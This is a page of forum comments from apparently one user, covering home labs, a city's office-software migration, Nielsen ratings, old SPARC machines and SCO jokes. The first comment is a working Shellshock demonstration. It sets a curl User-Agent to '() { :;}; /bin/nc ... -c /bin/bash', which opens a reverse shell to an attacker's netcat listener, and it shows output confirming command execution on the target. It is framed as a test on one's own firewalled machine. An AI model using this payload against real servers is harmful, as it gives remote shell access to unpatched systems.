Comment Here's a fun little test... (Score 3, Informative) 318

Here's a fun little test. This is assuming both the attacker and target have netcat installed. On a machine with the vulnerable bash and apache-cgi (behind a firewall for god's sake!) drop a file in your cgi-bin directory:

echo Content-type: text/plain
echo ""

You should be able to go to


and get a listing of apache's cgi directory.

Now, from your attack machine run "nc -l -p 1234", and then (in another terminal) run "curl -A "() { :;}; /bin/nc attack.machine.ip.address 1234 -c /bin/bash". You now have a shell via netcat.

(from attacking machine netcat)

touch /tmp/pwnt

(on target)

ls -al /tmp/pwnt

$-rw-r--r-- 1 www-data www-data 0 Sep 25 15:53 /tmp/pwnt

Comment Down to two servers... (Score 1) 287

I used to run a whole pile of servers, from DEC alphas to various Ultrasparcs to Linux servers.... now I'm down to a single ZFS-on-linux SAN server and a Supermicro chassis that has two dual-quad motherboards with 32GB of RAM each running a pair of Xen hypervisors. In my home lab I can fire up VMs left and right to test whatever I need to before I bring it to a client and play with my own projects at the same time. The important stuff I have runs in a datacenter but it's been great having such a flexible home lab. The only downside is the Supermicro is LOUD due to all of it's tiny little high-speed fans so I've had to baffle it with various home-made contraptions to keep it from sounding like a jet.

Comment Document formats... (Score 5, Insightful) 579

As far as I can tell from that horrible translation the only real complaints from users are about document interoperability problems and a unified messaging platform. Document format problems were going to be a given as MS will NEVER allow their software to default to an open standard (gotta sell dem Office seats); the best you can do is tell everyone who is going to be dealing with your city to send your documents in universal standard. As far a unified messaging platform goes, somebody screwed up if they couldn't get a fleet of smartphones to talk to a standard email server. Integrating with an open caldav/cardav server is tougher, but not impossible. They've already dropped a lot of cash on this transition and if those are the only two real complaints it seems more likely that the politicos are banking on a pile of $$ concessions from MS.

Comment Article is bereft of real numbers (Score 5, Interesting) 349

Household that do not own a TV set? Or households that own a TV set but don't have cable, OTA tv? In our case we dropped cable several years ago, still have OTA TV thanks to an antenna on the roof of our condo, but consume the vast majority of content through a computer hooked to the TV. So we own a TV, but according to Neilsen's rules maybe we don't own a TV? Maybe we just own a huge monitor? Maybe we don't qualify to be a Nielsen Family so we don't count?

Comment SPARC Classic (Score 1) 317

Oldest one I still -own- is a SPARC Classic (the old lunchbox 50Mhz sun4m one). It sits on a shelf; I haven't used it or really thought about it for a while. I mainly still have it for nostalgia - its what I learned Solaris on back in the day (2.5 or 2.6 I think) when I was a lowly tech support drone at a small mom-and-pop ISP in the mid-90s, and I also learned a lot about UNIX/Linux networking by figuring out how to netboot slackware onto it. An ISP I sysadmined for from 2001-2006 or so used a stack of them for DNS and NTP servers. I also have a SUN Blade 100 that I retired as a desktop UNIX machine a few years ago as it no longer has the balls to keep up (Firefox/Thunderbird/etc bloat). It also got relegated to a closet as I can't bring myself to throw it away. I also had a few pizza-box Sparcstations and Ultrasparc/US2 systems as part of my personal lab over the years but eventually recycled them. None of the places I consult/contract for use Solaris anymore, so its hard to justify running multiple systems for testing when I can run a cheap dual-quad core Linux box with Xen VMs and simulate a large network on a single system.

The oldest machine I still have in use is an old Dell PIII (slot style!) that I run Windows 98 on to play some old games, like Jane's USAF, Dungeon Keeper/DK2 and Mechwarrior 3. It spends most of its time shut off, but every now and then I get a hankerin' for a spankerin'.

Comment Re:Just one case (Score 1) 152

I'm also hoping to see SCO v Microsoft, where SCO sues Microsoft for not providing sufficient funds to slow the growth of Linux as agreed, and Microsoft countersues because SCO didn't achieve the success they promised with the initial round of funding.

Woohoo! Microsoft gets to double their investment!

The sad part is, the only ones who made out on the original investment are a bunch of greedy,slimeball shyster lawyers and a greedy, scumsucking worthless CEO. Whoops, I just made a tautology train. Everyone on board! WOO WOOOO

